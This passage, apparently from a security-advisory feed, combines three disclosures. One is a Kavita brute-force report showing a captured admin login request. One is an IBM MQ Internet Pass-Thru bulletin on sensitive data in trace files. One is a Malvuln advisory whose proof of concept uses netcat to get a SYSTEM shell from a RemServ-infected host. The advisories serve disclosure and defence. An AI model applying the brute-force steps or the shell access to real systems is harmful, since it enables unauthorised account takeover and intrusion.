    DNT: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
    Referer: http://192.168.189.132:5000/admin/dashboard
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,id-ID;q=0.8,id;q=0.7,ar-SA;q=0.6,ar;q=0.5
    Connection: close
    Content-Type: application/json
    Content-Length: 67
    
    {"Email":"xxx@local.com",
    "Username":"admin",
    "Password":"xxx"
    }
    

**2\. Mark on the Password value**

**3\. Bruteforce attack with 1000 password list and get valid admin password**

**Impact**

An attacker could perform a brute-force attack targeting normal and administrative users, using different passwords and eventually gain access to the targeted account, without any restriction.

CVE-2022-3993: No Rate Limit On migrate-email Endpoint Leads to Brute-force Attack in kavita

IBM MQ Internet Pass-Thru 2.1, 9.2 LTS and 9.2 CD stores potentially sensitive information in trace files that could be read by a local user.

**Security Bulletin**

  

**Summary**

An issue was found within IBM MQ Internet Pass-Thru which causes sensitive data to be written to trace files when trace is enabled.

**Vulnerability Details**

**CVEID:**   CVE-2022-35719  
**DESCRIPTION:**   IBM MQ stores potentially sensitive information in trace files that could be read by a local user.  
CVSS Base score: 5.1  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/231370 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N)

**Affected Products and Versions**

Affected Product(s)

Version(s)

IBM MQ Internet Pass-Thru

2.1

IBM MQ Internet Pass-Thru

9.2 LTS

IBM MQ Internet Pass-Thru

9.2 CD

**Remediation/Fixes**

**Workarounds and Mitigations**

None

**References**

Off

**Change History**

10 Nov 2022: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSYHRD","label":"IBM MQ"},"Component":"","Platform":\[{"code":"PF002","label":"AIX"},{"code":"PF016","label":"Linux"},{"code":"PF051","label":"Linux on IBM Z Systems"},{"code":"PF033","label":"Windows"},{"code":"PF027","label":"Solaris"}\],"Version":"2.1.0, 9.2","Edition":"All","Line of Business":{"code":"LOB45","label":"Automation"}}\]

CVE-2022-35719: IBM MQ Internet Pass-Thru traces sensitive data (CVE-2022-35719)

Backdoor.Win32.RemServ.d malware suffers from a remote command execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/05a082d441d9cf365749c0e1eb904c85.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.RemServ.dVulnerability: Unauthenticated Remote Command ExecutionFamily: RemServType: PE32MD5: 05a082d441d9cf365749c0e1eb904c85Vuln ID: MVID-2022-0655Disclosure: 11/11/2022Description: The malware creates a service "RSMSS" that runs as SYSTEM and listens on TCP port 26103. Remote attackers who can connect to an infected host will get back a shell as "nt authority\system".Exploit/PoC:C:\>nc64.exe x.x.x.x 26103Microsoft Windows [Version 10.0.16299.309](c) 2017 Microsoft Corporation. All rights reserved.C:\>whoamiwhoamint authority\systemC:\>net usernet userUser accounts for \\----------------------------------------------------------------------------Administrator            DefaultAccount           GuestVictim                   WDAGUtilityAccountThe command completed with one or more errors.Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Tag

#windows